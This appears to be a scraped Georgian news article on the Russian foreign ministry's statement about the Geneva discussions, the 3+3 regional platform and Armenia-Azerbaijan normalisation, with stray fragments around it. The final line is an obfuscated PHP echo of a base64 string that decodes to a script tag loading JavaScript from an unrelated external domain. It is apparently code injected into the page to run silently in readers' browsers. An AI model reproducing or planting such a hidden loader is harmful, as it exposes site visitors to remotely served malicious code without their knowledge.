celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა სამინისტროში აცხადებენ, რომ მზად არიან, გააგრძელონ კონსტრუქციული ურთიერთობა ჟენევის საერთაშორისო დისკუსიების ფარგლებში. ამის შესახებ ნათქვამია მედიის შეკითხვებზე რუსეთის საგარეო საქმეთა უწყების მიერ გაცემულ პასუხებში, რომლებიც სამინისტროს ვებგვერდზე გამოქვეყნდა.
სამინისტროს სამხრეთ კავკასიაში რუსეთის სტრატეგიული გეგმისა და ხუთწლიან პერსპექტივაში რუსეთის მიზნების შესახებ ჰკითხეს.
„ვრჩებით ერთგული მოქმედი და ამჟამად ფორმირებული მრავალმხრივი მოლაპარაკებების ფორმატების მიმართ. მზად ვართ, გავაგრძელოთ კონსტრუქციული ურთიერთობა სამხრეთ კავკასიაში უსაფრთხოებისა და სტაბილურობის ჟენევის საერთაშორისო დისკუსიების ფარგლებში, რომელიც უზრუნველყოფს საქართველოს პირდაპირ, თანაბარუფლებიან დიალოგს აფხაზეთთან და სამხრეთ ოსეთთან“, – ნათქვამია განცხადებაში.
უწყება ასევე აღნიშნავს, რომ მიმართულია განავითაროს 2021 დეკემბერს ჩამოყალიბებული საკონსულტაციო რეგიონული პლატფორმის 3+3-ის მუშაობა.
„მიგვაჩნია, რომ ეს პლატფორმა, სადაც იგეგმება რეგიონული მოთამაშეების ინტერესებში თანამშრომლობის გაძლიერების პრაქტიკულ საკითხებზე კონცენტრირება, სასარგებლო და დროულია“, – აღნიშნულია განცხადებაში.
უწყებაში აღნიშნავენ, რომ რუსეთი დაინტერესებულია სამხრეთ კავკასიის რეგიონის სტაბილურობით და კეთილდღეობით და ინტენსიურად მუშაობს რეგიონში „კონფლიქტური პოტენციალის“ გადალახვაზე.
„სამხრეთ კავკასიის რესპუბლიკებთან ჩვენ გვაკავშირებს საერთო ისტორია, სასულიერო-კულტურული სიახლოვე, ხალხებს შორის მეგობრობის მჭიდრო კავშირები. რუსეთი, რომელიც უშუალოდ ესაზღვრება სამხრეთ კავკასიას, დაინტერესებულია ამ რეგიონის სტაბილურობით და კეთილდღეობით, მისი სატრანსპორტო-ლოგისტიკური, სავაჭრო-საინვესტიციო, ტექნოლოგიური შესაძლებლობების ურთიერთმომგებიან გამოყენებით და გახსნით. ჩვენ ინტენსიურად ვმუშაობთ რეგიონში დაგროვებული კონფლიქტური პოტენციალის გადალახვაზე. ამ მხრივ, ერთ-ერთი პრიორიტეტული ამოცანა – სომხეთ-აზერბაიჯანის ურთიერთობების ნორმალიზებაა“, – აღნიშნავს სამინისტრო.
რუსეთის საგარეო უწყებაში მიაჩნიათ, რომ სომხეთ-აზერბაიჯანის ურთიერთობების ნორმალიზების ფუნდამენტს წარმოადგენს რუსეთის, აზერბაიჯანისა და სომხეთის ლიდერების 2020 წლის 9 ნოემბრის, 2021 წლის 11 იანვრის და 26 ნოემბრის, ასევე 2022 წლის 31 ოქტომბრის სამმხრივი განცხადებები. 
270
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");